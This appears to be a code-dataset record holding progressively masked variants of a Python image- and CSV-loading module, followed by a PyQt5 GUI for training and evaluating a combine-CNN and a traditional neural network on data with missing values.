[ "import os\nimport requests\nfrom PIL import Image\nfrom io import BytesIO\nimport csv\nfrom typing import Iterable, List, Tuple, Dict, Callable, Union, Collection\n\n\n# pull the image from the api endpoint and save it if we don't have it, else load it from disk\ndef get_img_from_file_or_url(img_format: str = 'JPEG') -> Callable[[str, str], Image.Image]:\n def _apply(filepath: str, url: str) -> Image.Image:\n img = from_file(filepath)\n if img is None:\n img = from_url(url)\n img.save(filepath, img_format)\n return img.convert('RGB') # convert to rgb if not already (eg if grayscale)\n return _apply\n\n\ndef from_url(url: str) -> Image.Image:\n api_response = requests.get(url).content\n response_bytes = BytesIO(api_response)\n return Image.open(response_bytes)\n\n\ndef from_file(path: str) -> Union[Image.Image, None]:\n if os.path.exists(path):\n return Image.open(path)\n else:\n return None\n\n\ndef load_metadata(path: str, cols: Iterable[int], class_cols: Collection[int] = tuple(), valid_only: bool = True, **reader_args)\\\n -> Tuple[List, int, List, List[Dict[str, int]], List[Dict[int, str]], int]:\n metadata = []\n # one dict for each class col\n class_to_index: List[Dict[str, int]] = [{}] * len(class_cols)\n index_to_class: List[Dict[int, str]] = [{}] * len(class_cols)\n next_indices = [0] * len(class_cols) # next index for a new class value\n with open(path, 'r', newline='', encoding=\"utf8\") as metadata_file:\n reader = csv.reader(metadata_file, **reader_args)\n headers = next(reader)\n for row in reader:\n if len(row) != 0:\n metadatum = [row[c] for c in cols]\n # for all class cols, add their vals to the class_to_index and index_to_class dicts if not there already\n for c, class_col in enumerate(class_cols):\n if not row[class_col] in class_to_index[c]:\n class_to_index[c][row[class_col]] = next_indices[c]\n index_to_class[c][next_indices[c]] = row[class_col]\n next_indices[c] += 1\n if valid_only and '' in metadatum:\n continue\n metadata.append(metadatum)\n len_metadata = len(metadata)\n num_classes = 0 if len(next_indices) == 0 else next_indices[-1]\n # split off the headers\n return metadata, len_metadata, headers, class_to_index, index_to_class, num_classes\n", "import os\nimport requests\nfrom PIL import Image\nfrom io import BytesIO\nimport csv\nfrom typing import Iterable, List, Tuple, Dict, Callable, Union, Collection\n\n\ndef get_img_from_file_or_url(img_format: str='JPEG') ->Callable[[str, str],\n Image.Image]:\n\n def _apply(filepath: str, url: str) ->Image.Image:\n img = from_file(filepath)\n if img is None:\n img = from_url(url)\n img.save(filepath, img_format)\n return img.convert('RGB')\n return _apply\n\n\ndef from_url(url: str) ->Image.Image:\n api_response = requests.get(url).content\n response_bytes = BytesIO(api_response)\n return Image.open(response_bytes)\n\n\ndef from_file(path: str) ->Union[Image.Image, None]:\n if os.path.exists(path):\n return Image.open(path)\n else:\n return None\n\n\ndef load_metadata(path: str, cols: Iterable[int], class_cols: Collection[\n int]=tuple(), valid_only: bool=True, **reader_args) ->Tuple[List, int,\n List, List[Dict[str, int]], List[Dict[int, str]], int]:\n metadata = []\n class_to_index: List[Dict[str, int]] = [{}] * len(class_cols)\n index_to_class: List[Dict[int, str]] = [{}] * len(class_cols)\n next_indices = [0] * len(class_cols)\n with open(path, 'r', newline='', encoding='utf8') as metadata_file:\n reader = csv.reader(metadata_file, **reader_args)\n headers = next(reader)\n for row in reader:\n if len(row) != 0:\n metadatum = [row[c] for c in cols]\n for c, class_col in enumerate(class_cols):\n if not row[class_col] in class_to_index[c]:\n class_to_index[c][row[class_col]] = next_indices[c]\n index_to_class[c][next_indices[c]] = row[class_col]\n next_indices[c] += 1\n if valid_only and '' in metadatum:\n continue\n metadata.append(metadatum)\n len_metadata = len(metadata)\n num_classes = 0 if len(next_indices) == 0 else next_indices[-1]\n return (metadata, len_metadata, headers, class_to_index, index_to_class,\n num_classes)\n", "<import token>\n\n\ndef get_img_from_file_or_url(img_format: str='JPEG') ->Callable[[str, str],\n Image.Image]:\n\n def _apply(filepath: str, url: str) ->Image.Image:\n img = from_file(filepath)\n if img is None:\n img = from_url(url)\n img.save(filepath, img_format)\n return img.convert('RGB')\n return _apply\n\n\ndef from_url(url: str) ->Image.Image:\n api_response = requests.get(url).content\n response_bytes = BytesIO(api_response)\n return Image.open(response_bytes)\n\n\ndef from_file(path: str) ->Union[Image.Image, None]:\n if os.path.exists(path):\n return Image.open(path)\n else:\n return None\n\n\ndef load_metadata(path: str, cols: Iterable[int], class_cols: Collection[\n int]=tuple(), valid_only: bool=True, **reader_args) ->Tuple[List, int,\n List, List[Dict[str, int]], List[Dict[int, str]], int]:\n metadata = []\n class_to_index: List[Dict[str, int]] = [{}] * len(class_cols)\n index_to_class: List[Dict[int, str]] = [{}] * len(class_cols)\n next_indices = [0] * len(class_cols)\n with open(path, 'r', newline='', encoding='utf8') as metadata_file:\n reader = csv.reader(metadata_file, **reader_args)\n headers = next(reader)\n for row in reader:\n if len(row) != 0:\n metadatum = [row[c] for c in cols]\n for c, class_col in enumerate(class_cols):\n if not row[class_col] in class_to_index[c]:\n class_to_index[c][row[class_col]] = next_indices[c]\n index_to_class[c][next_indices[c]] = row[class_col]\n next_indices[c] += 1\n if valid_only and '' in metadatum:\n continue\n metadata.append(metadatum)\n len_metadata = len(metadata)\n num_classes = 0 if len(next_indices) == 0 else next_indices[-1]\n return (metadata, len_metadata, headers, class_to_index, index_to_class,\n num_classes)\n", "<import token>\n<function token>\n\n\ndef from_url(url: str) ->Image.Image:\n api_response = requests.get(url).content\n response_bytes = BytesIO(api_response)\n return Image.open(response_bytes)\n\n\ndef from_file(path: str) ->Union[Image.Image, None]:\n if os.path.exists(path):\n return Image.open(path)\n else:\n return None\n\n\ndef load_metadata(path: str, cols: Iterable[int], class_cols: Collection[\n int]=tuple(), valid_only: bool=True, **reader_args) ->Tuple[List, int,\n List, List[Dict[str, int]], List[Dict[int, str]], int]:\n metadata = []\n class_to_index: List[Dict[str, int]] = [{}] * len(class_cols)\n index_to_class: List[Dict[int, str]] = [{}] * len(class_cols)\n next_indices = [0] * len(class_cols)\n with open(path, 'r', newline='', encoding='utf8') as metadata_file:\n reader = csv.reader(metadata_file, **reader_args)\n headers = next(reader)\n for row in reader:\n if len(row) != 0:\n metadatum = [row[c] for c in cols]\n for c, class_col in enumerate(class_cols):\n if not row[class_col] in class_to_index[c]:\n class_to_index[c][row[class_col]] = next_indices[c]\n index_to_class[c][next_indices[c]] = row[class_col]\n next_indices[c] += 1\n if valid_only and '' in metadatum:\n continue\n metadata.append(metadatum)\n len_metadata = len(metadata)\n num_classes = 0 if len(next_indices) == 0 else next_indices[-1]\n return (metadata, len_metadata, headers, class_to_index, index_to_class,\n num_classes)\n", "<import token>\n<function token>\n\n\ndef from_url(url: str) ->Image.Image:\n api_response = requests.get(url).content\n response_bytes = BytesIO(api_response)\n return Image.open(response_bytes)\n\n\ndef from_file(path: str) ->Union[Image.Image, None]:\n if os.path.exists(path):\n return Image.open(path)\n else:\n return None\n\n\n<function token>\n", "<import token>\n<function token>\n\n\ndef from_url(url: str) ->Image.Image:\n api_response = requests.get(url).content\n response_bytes = BytesIO(api_response)\n return Image.open(response_bytes)\n\n\n<function token>\n<function token>\n", "<import token>\n<function token>\n<function token>\n<function token>\n<function token>\n" ]
false
9
302605d8bb45b1529742bf9441d476f0276085b9
import sys from PyQt5.QtWidgets import (QMainWindow, QWidget, QHBoxLayout, QVBoxLayout, QFrame, QSplitter, QStyleFactory, QApplication, QPushButton, QTextEdit, QLabel, QFileDialog, QMessageBox) from PyQt5.QtCore import Qt from PyQt5.QtGui import QFont, QColor import myLoadData from UIPack import setLossParameterDialog, showDataWidget, setModelParametersDialog, TrainingWidget, showResultWidget,\ showJudgeWidgets, chooseJudgeDataSetWidget from MyCombCNNPack import combineNumCalculate, myCombineCNN, traditionalNN, Judgement class MyMainWindow(QMainWindow): def __init__(self): super().__init__() self.windowLength = 1250 self.windowHigh = 900 self.fname = dict() self.fname['New'] = None self.fname['Tra'] = None self.dataLossRate = dict() self.dataSetLossValue = dict() self.dataFor = dict() self.dataFor['New'] = None self.dataLossRate['New'] = 0. self.dataSetLossValue['New'] = 0. self.dataFor['Tra'] = None self.dataLossRate['Tra'] = 0. self.dataSetLossValue['Tra'] = 0. self.traingWidgetOnFlag = dict() self.traingWidgetOnFlag['New'] = False self.traingWidgetOnFlag['Tra'] = False self.combineNumConv = 2 self.convCoreNum = 5 self.combineNumPooling = 4 self.fullConnectOutInRate = 0.5 self.mcbcnn = None self.trann = None self.trainingW = None self.trainingWT = None self.initUI() self.initConnect() def initUI(self): self.statusBar().showMessage('Ready') ####### data module ####### dataModule = QVBoxLayout() self.dataFileChooseButton = QPushButton('选择数据') self.dataFileChooseButton.setFont(QFont('微软雅黑', 16)) self.dataLossSimulateSettingButton = QPushButton('设置数据缺失参数') self.dataLossSimulateSettingButton.setFont(QFont('微软雅黑', 16)) self.dataShowButton = QPushButton('展示数据') self.dataShowButton.setFont(QFont('微软雅黑', 16)) label = QLabel('Present Data:') label.setFont(QFont('微软雅黑', 16)) self.presentDataName = QLabel('None') self.presentDataName.setFont(QFont('微软雅黑', 16)) labelbox = QVBoxLayout() labelbox.addWidget(label) labelbox.addWidget(self.presentDataName) dataModule.addStretch(1) dataModule.addLayout(labelbox) dataModule.addStretch(1) dataModule.addWidget(self.dataFileChooseButton) dataModule.addStretch(1) dataModule.addWidget(self.dataLossSimulateSettingButton) dataModule.addStretch(1) dataModule.addWidget(self.dataShowButton) dataModule.addStretch(1) ###### training module ######## trainingModule = QVBoxLayout() self.setModelParametersButton = QPushButton('Model Parameters') self.setModelParametersButton.setFont(QFont('微软雅黑', 16)) # self.setTrainingParametersButton = QPushButton('Trainning Parameters') # self.setTrainingParametersButton.setFont(QFont('微软雅黑', 16)) self.trainingButton = QPushButton('Training') self.trainingButton.setFont(QFont('微软雅黑', 16)) self.saveModelButton = QPushButton('Save Model') self.saveModelButton.setFont(QFont('微软雅黑', 16)) self.loadModelButton = QPushButton('Load Model') self.loadModelButton.setFont(QFont('微软雅黑', 16)) label = QLabel('Present Model:') label.setFont(QFont('微软雅黑', 16)) self.presentModelName = QLabel('None') self.presentModelName.setFont(QFont('微软雅黑', 16)) labelbox = QVBoxLayout() labelbox.addWidget(label) labelbox.addWidget(self.presentModelName) trainingModule.addStretch(1) trainingModule.addLayout(labelbox) trainingModule.addStretch(1) trainingModule.addWidget(self.setModelParametersButton) trainingModule.addStretch(1) trainingModule.addWidget(self.trainingButton) trainingModule.addStretch(1) trainingModule.addWidget(self.saveModelButton) trainingModule.addStretch(1) trainingModule.addWidget(self.loadModelButton) trainingModule.addStretch(1) ############## new cnn result show ###### resultShowModule = QVBoxLayout() self.showResultButton = QPushButton('分类结果展示') self.showResultButton.setFont(QFont('微软雅黑', 16)) self.judgeResultButton = QPushButton('分类结果评估') self.judgeResultButton.setFont(QFont('微软雅黑', 16)) resultShowModule.addWidget(self.showResultButton) resultShowModule.addWidget(self.judgeResultButton) ################# new algorithm ui ########## hboxTop = QHBoxLayout() hboxTop.addStretch(1) mcnnLabel = QLabel('Combine-CNN:') mcnnLabel.setFont(QFont('微软雅黑', 24, QFont.Bold)) hboxTop.addWidget(mcnnLabel) hboxTop.addStretch(1) hboxTop.addLayout(dataModule) hboxTop.addStretch(1) hboxTop.addLayout(trainingModule) hboxTop.addStretch(1) hboxTop.addLayout(resultShowModule) hboxTop.addStretch(1) #########traditional data module########## dataModuleT = QVBoxLayout() self.dataFileChooseButtonT = QPushButton('选择数据') self.dataFileChooseButtonT.setFont(QFont('微软雅黑', 16)) self.dataLossSimulateSettingButtonT = QPushButton('设置数据缺失参数') self.dataLossSimulateSettingButtonT.setFont(QFont('微软雅黑', 16)) self.dataPreProcessButtonT = QPushButton('数据预处理') self.dataPreProcessButtonT.setFont(QFont('微软雅黑', 16)) self.dataShowButtonT = QPushButton('展示数据') self.dataShowButtonT.setFont(QFont('微软雅黑', 16)) label = QLabel('Present Data:') label.setFont(QFont('微软雅黑', 16)) self.presentDataNameT = QLabel('None') self.presentDataNameT.setFont(QFont('微软雅黑', 16)) labelbox = QVBoxLayout() labelbox.addWidget(label) labelbox.addWidget(self.presentDataNameT) dataModuleT.addStretch(1) dataModuleT.addLayout(labelbox) dataModuleT.addStretch(1) dataModuleT.addWidget(self.dataFileChooseButtonT) dataModuleT.addStretch(1) dataModuleT.addWidget(self.dataLossSimulateSettingButtonT) dataModuleT.addStretch(1) dataModuleT.addWidget(self.dataPreProcessButtonT) dataModuleT.addStretch(1) dataModuleT.addWidget(self.dataShowButtonT) dataModuleT.addStretch(1) ###### training module ######## trainingModuleT = QVBoxLayout() self.setModelParametersButtonT = QPushButton('Model Parameters') self.setModelParametersButtonT.setFont(QFont('微软雅黑', 16)) self.trainingButtonT = QPushButton('Training') self.trainingButtonT.setFont(QFont('微软雅黑', 16)) self.saveModelButtonT = QPushButton('Save Model') self.saveModelButtonT.setFont(QFont('微软雅黑', 16)) self.loadModelButtonT = QPushButton('Load Model') self.loadModelButtonT.setFont(QFont('微软雅黑', 16)) label = QLabel('Present Model:') label.setFont(QFont('微软雅黑', 16)) self.presentModelNameT = QLabel('None') self.presentModelNameT.setFont(QFont('微软雅黑', 16)) labelbox = QVBoxLayout() labelbox.addWidget(label) labelbox.addWidget(self.presentModelNameT) trainingModuleT.addStretch(1) trainingModuleT.addLayout(labelbox) trainingModuleT.addStretch(1) trainingModuleT.addWidget(self.setModelParametersButtonT) trainingModuleT.addStretch(1) trainingModuleT.addWidget(self.trainingButtonT) trainingModuleT.addStretch(1) trainingModuleT.addWidget(self.saveModelButtonT) trainingModuleT.addStretch(1) trainingModuleT.addWidget(self.loadModelButtonT) trainingModuleT.addStretch(1) ############## traditional nn result show ###### resultShowModuleT = QVBoxLayout() self.showResultButtonT = QPushButton('分类结果展示') self.showResultButtonT.setFont(QFont('微软雅黑', 16)) self.judgeResultButtonT = QPushButton('分类结果评估') self.judgeResultButtonT.setFont(QFont('微软雅黑', 16)) resultShowModuleT.addWidget(self.showResultButtonT) resultShowModuleT.addWidget(self.judgeResultButtonT) ####### traditional algorithm ######### hboxBottom = QHBoxLayout(self) hboxBottom.addStretch(1) traditionNNLabel = QLabel('Traditional NN:') traditionNNLabel.setFont(QFont('微软雅黑', 24, QFont.Bold)) hboxBottom.addWidget(traditionNNLabel) hboxBottom.addStretch(1) hboxBottom.addLayout(dataModuleT) hboxBottom.addStretch(1) hboxBottom.addLayout(trainingModuleT) hboxBottom.addStretch(1) hboxBottom.addLayout(resultShowModuleT) hboxBottom.addStretch(1) ########## whole frame layout ######## splitterLine = QLabel(self) splitterLine.setFont(QFont('Times', 1)) col = QColor(0, 0, 0) splitterLine.setStyleSheet("QWidget { background-color: %s }" % col.name()) splitterLine.resize(splitterLine.sizeHint()) vbox = QVBoxLayout() vbox.addLayout(hboxTop) # vbox.addWidget(QLabel(str('_'*int(self.width()/3)))) vbox.addWidget(splitterLine) vbox.addLayout(hboxBottom) mainWidget = QWidget() mainWidget.setLayout(vbox) self.setCentralWidget(mainWidget) self.setGeometry(350, 100, self.windowLength, self.windowHigh) self.setWindowTitle('适用于有缺失值数据集的神经网络系统') self.show() def initConnect(self): self.dataFileChooseButton.clicked.connect(self.chooseData) self.dataFileChooseButtonT.clicked.connect(self.chooseData) self.dataLossSimulateSettingButton.clicked.connect(self.setLossParameter) self.dataLossSimulateSettingButtonT.clicked.connect(self.setLossParameter) self.dataShowButton.clicked.connect(self.showData) self.dataShowButtonT.clicked.connect(self.showData) self.dataPreProcessButtonT.clicked.connect(self.preProcess) self.setModelParametersButton.clicked.connect(self.setModelParameters) self.setModelParametersButtonT.clicked.connect(self.setModelParameters) self.trainingButton.clicked.connect(self.training) self.trainingButtonT.clicked.connect(self.training) self.saveModelButton.clicked.connect(self.saveModel) self.saveModelButtonT.clicked.connect(self.saveModel) self.loadModelButton.clicked.connect(self.loadModel) self.loadModelButtonT.clicked.connect(self.loadModel) self.showResultButton.clicked.connect(self.showResult) self.showResultButtonT.clicked.connect(self.showResult) self.judgeResultButton.clicked.connect(self.showJudge) self.judgeResultButtonT.clicked.connect(self.showJudge) ############ data load module ##################### def chooseData(self): if self.sender() is self.dataFileChooseButton: self.fname['New'], ok = QFileDialog.getOpenFileName(self, 'Open file', '..', 'Text files (*.txt)') if ok: # dataname = self.fname['New'].split('/')[-1].split('.')[0] # # print(dataname) # self.presentDataName.setText(dataname) # self.presentDataName.resize(self.presentDataName.sizeHint()) self.loadData() elif self.sender() is self.dataFileChooseButtonT: self.fname['Tra'], ok = QFileDialog.getOpenFileName(self, 'Open file', '..', 'Text files (*.txt)') if ok: # dataname = self.fname['Tra'].split('/')[-1].split('.')[0] # # print(dataname) # self.presentDataNameT.setText(dataname) # self.presentDataNameT.resize(self.presentDataNameT.sizeHint()) self.loadData() return def loadData(self): if self.sender() is self.dataFileChooseButton: try: self.dataFor['New'] = myLoadData.loadData(self.fname['New'], self.dataLossRate['New'], self.dataSetLossValue['New']) # print(self.dataFor['New'].DataTrainX, '\n', self.dataFor['New'].DataTrainY) except FileNotFoundError as e: reply = QMessageBox.information(self, 'Message', "Data file not exist", QMessageBox.Yes, QMessageBox.Yes) return except Exception: reply = QMessageBox.information(self, 'Message', "Data file format error", QMessageBox.Yes, QMessageBox.Yes) return dataname = self.fname['New'].split('/')[-1].split('.')[0] # print(dataname) self.presentDataName.setText(dataname) self.presentDataName.resize(self.presentDataName.sizeHint()) elif self.sender() is self.dataFileChooseButtonT: try: self.dataFor['Tra'] = myLoadData.loadData(self.fname['Tra'], self.dataLossRate['Tra'], self.dataSetLossValue['Tra']) # print(self.dataFor['Tra'].DataTrainX, '\n', self.dataFor['Tra'].DataTrainY) except FileNotFoundError as e: reply = QMessageBox.information(self, 'Message', "Data file not exist", QMessageBox.Yes, QMessageBox.Yes) return except Exception: reply = QMessageBox.information(self, 'Message', "Data file format error", QMessageBox.Yes, QMessageBox.Yes) return dataname = self.fname['Tra'].split('/')[-1].split('.')[0] # print(dataname) self.presentDataNameT.setText(dataname) self.presentDataNameT.resize(self.presentDataNameT.sizeHint()) return def setLossParameter(self): if self.sender() is self.dataLossSimulateSettingButton: self.setLPDialog = setLossParameterDialog.setLossParameterDialog('combine-CNN设置缺失参数', self, 'New') elif self.sender() is self.dataLossSimulateSettingButtonT: self.setLPDialog = setLossParameterDialog.setLossParameterDialog('traditional NN设置缺失参数', self, 'Tra') # print(self.dataLossRate) # print(self.dataSetLossValue) return def showData(self): if self.sender() is self.dataShowButton: # print(1) self.showDataW = showDataWidget.ShowDataWidget('combine-CNN数据展示', self, 'New') elif self.sender() is self.dataShowButtonT: # print(1) self.showDataW = showDataWidget.ShowDataWidget('traditional NN数据展示', self, 'Tra') return def preProcess(self): if self.dataFor['Tra'] is None: reply = QMessageBox.information(self, '数据错误', '没有加载数据,无法预处理', QMessageBox.Yes, QMessageBox.Yes) else: self.dataFor['Tra'].MeanPreProcess() reply = QMessageBox.information(self, 'Message', 'PreProcess succeed!', QMessageBox.Yes, QMessageBox.Yes) return ############## training module ################# def setModelParameters(self): if self.sender() is self.setModelParametersButton: # print(1) self.setModelParaW = setModelParametersDialog.setLossParameterDialog('combine-CNN模型参数设置', self, 'New') elif self.sender() is self.setModelParametersButtonT: self.setModelParaW = setModelParametersDialog.setLossParameterDialog('traditional NN模型参数设置', self, 'Tra') def training(self): if self.sender() is self.trainingButton: if self.trainingW is not None: self.trainingW.hide() # print(self.trainingW) self.trainingW.show() return senderName = 'New' elif self.sender() is self.trainingButtonT: if self.trainingWT is not None: self.trainingWT.hide() self.trainingWT.show() senderName = 'Tra' if self.dataFor[senderName] is None: reply = QMessageBox.information(self, '数据错误', '没有加载数据,无法训练', QMessageBox.Yes, QMessageBox.Yes) return elif senderName == 'New': if self.dataFor[senderName].DataTrainX.shape[1] < self.combineNumConv: reply = QMessageBox.information(self, '参数错误', '卷积层组合(卷积核)大小大于数据集特征数量', QMessageBox.Yes, QMessageBox.Yes) return if combineNumCalculate.combineNumCal(self.dataFor[senderName].DataTrainX.shape[1], self.combineNumConv)\ < self.combineNumPooling: reply = QMessageBox.information(self, '参数错误', '池化层组合(池化核)大小大于卷积层输出特征向量维度', QMessageBox.Yes, QMessageBox.Yes) return # print(self.trainingW) if self.trainingWT is not None: reply = QMessageBox.information(self, '提示', 'traditional NN训练正在进行,请等待其结束', QMessageBox.Yes, QMessageBox.Yes) return self.trainingW = TrainingWidget.trainningWidget('combine-CNN训练', self, senderName) self.traingWidgetOnFlag[senderName] = False elif senderName == 'Tra': if self.trainingW is not None: reply = QMessageBox.information(self, '提示', 'combine-CNN训练正在进行,请等待其结束', QMessageBox.Yes, QMessageBox.Yes) return self.trainingWT = TrainingWidget.trainningWidget('traditional NN训练', self, senderName) self.traingWidgetOnFlag[senderName] = False return def saveModel(self): if self.sender() is self.saveModelButton: if self.mcbcnn is None: reply = QMessageBox.information(self, '模型错误', '模型不存在', QMessageBox.Yes, QMessageBox.Yes) return else: fname, ok = QFileDialog.getSaveFileName(self, 'Save Model', '..\\myCombineCNN.cbcnn.json', 'Combine-CNN json files (*.cbcnn.json)') if ok: succeed = self.mcbcnn.saveModel(fname) if succeed: reply = QMessageBox.information(self, '保存结果', '模型保存成功', QMessageBox.Yes, QMessageBox.Yes) else: reply = QMessageBox.information(self, '保存结果', '模型保存失败', QMessageBox.Yes, QMessageBox.Yes) else: reply = QMessageBox.information(self, '保存结果', '模型保存失败', QMessageBox.Yes, QMessageBox.Yes) elif self.sender() is self.saveModelButtonT: if self.trann is None: reply = QMessageBox.information(self, '模型错误', '模型不存在', QMessageBox.Yes, QMessageBox.Yes) return else: fname, ok = QFileDialog.getSaveFileName(self, 'Save Model', '..\\traditionalNN.trann.json', 'Traditional NN json files (*.trann.json)') if ok: succeed = self.trann.saveModel(fname) if succeed: reply = QMessageBox.information(self, '保存结果', '模型保存成功', QMessageBox.Yes, QMessageBox.Yes) else: reply = QMessageBox.information(self, '保存结果', '模型保存失败', QMessageBox.Yes, QMessageBox.Yes) else: reply = QMessageBox.information(self, '保存结果', '模型保存失败', QMessageBox.Yes, QMessageBox.Yes) def loadModel(self): if self.sender() is self.loadModelButton: fname, ok = QFileDialog.getOpenFileName(self, 'Load Model', '..', 'Combine-CNN json files (*.cbcnn.json)') if ok: if self.mcbcnn is None: self.mcbcnn = myCombineCNN.myCombineCNN(None, self.combineNumConv, self.convCoreNum, self.combineNumPooling) succeed = self.mcbcnn.setModel(fname) if succeed: modelName = fname.split('/')[-1].split('.')[0] self.presentModelName.setText(modelName) reply = QMessageBox.information(self, '设置结果', '模型设置成功', QMessageBox.Yes, QMessageBox.Yes) else: reply = QMessageBox.information(self, '设置结果', '模型设置失败', QMessageBox.Yes, QMessageBox.Yes) else: reply = QMessageBox.information(self, '设置结果', '模型设置失败', QMessageBox.Yes, QMessageBox.Yes) elif self.sender() is self.loadModelButtonT: fname, ok = QFileDialog.getOpenFileName(self, 'Load Model', '..', 'Traditional NN json files (*.trann.json)') if ok: if self.trann is None: self.trann = traditionalNN.traditionalNN(None) succeed = self.trann.setModel(fname) if succeed: modelName = fname.split('/')[-1].split('.')[0] self.presentModelNameT.setText(modelName) reply = QMessageBox.information(self, '设置结果', '模型设置成功', QMessageBox.Yes, QMessageBox.Yes) else: reply = QMessageBox.information(self, '设置结果', '模型设置失败', QMessageBox.Yes, QMessageBox.Yes) else: reply = QMessageBox.information(self, '设置结果', '模型设置失败', QMessageBox.Yes, QMessageBox.Yes) return def showResult(self): if self.sender() is self.showResultButton: if self.traingWidgetOnFlag['New']: reply = QMessageBox.information(self, '提示', '训练正在进行', QMessageBox.Yes, QMessageBox.Yes) return self.showResultW = showResultWidget.ShowResultWidget('combine-CNN预测结果展示', self, 'New') elif self.sender() is self.showResultButtonT: if self.traingWidgetOnFlag['Tra']: reply = QMessageBox.information(self, '提示', '训练正在进行', QMessageBox.Yes, QMessageBox.Yes) return self.showResultW = showResultWidget.ShowResultWidget('traditional NN预测结果展示', self, 'Tra') return def showJudge(self): if self.sender() is self.judgeResultButton: if self.traingWidgetOnFlag['New']: reply = QMessageBox.information(self, '提示', '训练正在进行', QMessageBox.Yes, QMessageBox.Yes) return self.chooseJDWin = chooseJudgeDataSetWidget.chooseJudgeDataSetWidget('Choose Judgement-based-on Data Set', self, 'New') elif self.sender() is self.judgeResultButtonT: if self.traingWidgetOnFlag['Tra']: reply = QMessageBox.information(self, '提示', '训练正在进行', QMessageBox.Yes, QMessageBox.Yes) return self.chooseJDWin = chooseJudgeDataSetWidget.chooseJudgeDataSetWidget('Choose Judgement-based-on Data Set', self, 'Tra') # self.testw = showJudgeWidgets.judgeWidget('test', self, 'New', 'Train') # self.mcbcnn.runCNN('Test', self.dataFor['New']) # drawCM = Judgement.myJudge(self.mcbcnn.data.yClassDic, self.mcbcnn.getAccuratePredictResult().argmax(1), self.mcbcnn.data.DataTestY.argmax(1)) # drawCM.plotConfuseMatrix() if __name__ == '__main__': app = QApplication(sys.argv) myMainWindow = MyMainWindow() sys.exit(app.exec_())
[ "import sys\nfrom PyQt5.QtWidgets import (QMainWindow, QWidget, QHBoxLayout, QVBoxLayout, QFrame,\n QSplitter, QStyleFactory, QApplication, QPushButton, QTextEdit, QLabel, QFileDialog, QMessageBox)\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtGui import QFont, QColor\nimport myLoadData\nfrom UIPack import setLossParameterDialog, showDataWidget, setModelParametersDialog, TrainingWidget, showResultWidget,\\\n showJudgeWidgets, chooseJudgeDataSetWidget\nfrom MyCombCNNPack import combineNumCalculate, myCombineCNN, traditionalNN, Judgement\n\nclass MyMainWindow(QMainWindow):\n def __init__(self):\n super().__init__()\n\n self.windowLength = 1250\n self.windowHigh = 900\n\n self.fname = dict()\n self.fname['New'] = None\n self.fname['Tra'] = None\n\n self.dataLossRate = dict()\n self.dataSetLossValue = dict()\n self.dataFor = dict()\n\n self.dataFor['New'] = None\n self.dataLossRate['New'] = 0.\n self.dataSetLossValue['New'] = 0.\n\n self.dataFor['Tra'] = None\n self.dataLossRate['Tra'] = 0.\n self.dataSetLossValue['Tra'] = 0.\n\n self.traingWidgetOnFlag = dict()\n self.traingWidgetOnFlag['New'] = False\n self.traingWidgetOnFlag['Tra'] = False\n\n self.combineNumConv = 2\n self.convCoreNum = 5\n self.combineNumPooling = 4\n\n self.fullConnectOutInRate = 0.5\n\n self.mcbcnn = None\n self.trann = None\n\n self.trainingW = None\n self.trainingWT = None\n\n self.initUI()\n self.initConnect()\n\n def initUI(self):\n self.statusBar().showMessage('Ready')\n\n ####### data module #######\n dataModule = QVBoxLayout()\n\n self.dataFileChooseButton = QPushButton('选择数据')\n self.dataFileChooseButton.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButton = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButton.setFont(QFont('微软雅黑', 16))\n self.dataShowButton = QPushButton('展示数据')\n self.dataShowButton.setFont(QFont('微软雅黑', 16))\n\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataName = QLabel('None')\n self.presentDataName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataName)\n\n dataModule.addStretch(1)\n dataModule.addLayout(labelbox)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataFileChooseButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataLossSimulateSettingButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataShowButton)\n dataModule.addStretch(1)\n\n\n ###### training module ########\n trainingModule = QVBoxLayout()\n\n self.setModelParametersButton = QPushButton('Model Parameters')\n self.setModelParametersButton.setFont(QFont('微软雅黑', 16))\n # self.setTrainingParametersButton = QPushButton('Trainning Parameters')\n # self.setTrainingParametersButton.setFont(QFont('微软雅黑', 16))\n self.trainingButton = QPushButton('Training')\n self.trainingButton.setFont(QFont('微软雅黑', 16))\n self.saveModelButton = QPushButton('Save Model')\n self.saveModelButton.setFont(QFont('微软雅黑', 16))\n self.loadModelButton = QPushButton('Load Model')\n self.loadModelButton.setFont(QFont('微软雅黑', 16))\n\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelName = QLabel('None')\n self.presentModelName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelName)\n\n trainingModule.addStretch(1)\n trainingModule.addLayout(labelbox)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.setModelParametersButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.trainingButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.saveModelButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.loadModelButton)\n trainingModule.addStretch(1)\n\n ############## new cnn result show ######\n resultShowModule = QVBoxLayout()\n\n self.showResultButton = QPushButton('分类结果展示')\n self.showResultButton.setFont(QFont('微软雅黑', 16))\n self.judgeResultButton = QPushButton('分类结果评估')\n self.judgeResultButton.setFont(QFont('微软雅黑', 16))\n\n resultShowModule.addWidget(self.showResultButton)\n resultShowModule.addWidget(self.judgeResultButton)\n\n ################# new algorithm ui ##########\n hboxTop = QHBoxLayout()\n hboxTop.addStretch(1)\n\n mcnnLabel = QLabel('Combine-CNN:')\n mcnnLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxTop.addWidget(mcnnLabel)\n\n hboxTop.addStretch(1)\n\n hboxTop.addLayout(dataModule)\n\n hboxTop.addStretch(1)\n\n hboxTop.addLayout(trainingModule)\n\n hboxTop.addStretch(1)\n\n hboxTop.addLayout(resultShowModule)\n\n hboxTop.addStretch(1)\n\n #########traditional data module##########\n dataModuleT = QVBoxLayout()\n\n self.dataFileChooseButtonT = QPushButton('选择数据')\n self.dataFileChooseButtonT.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButtonT = 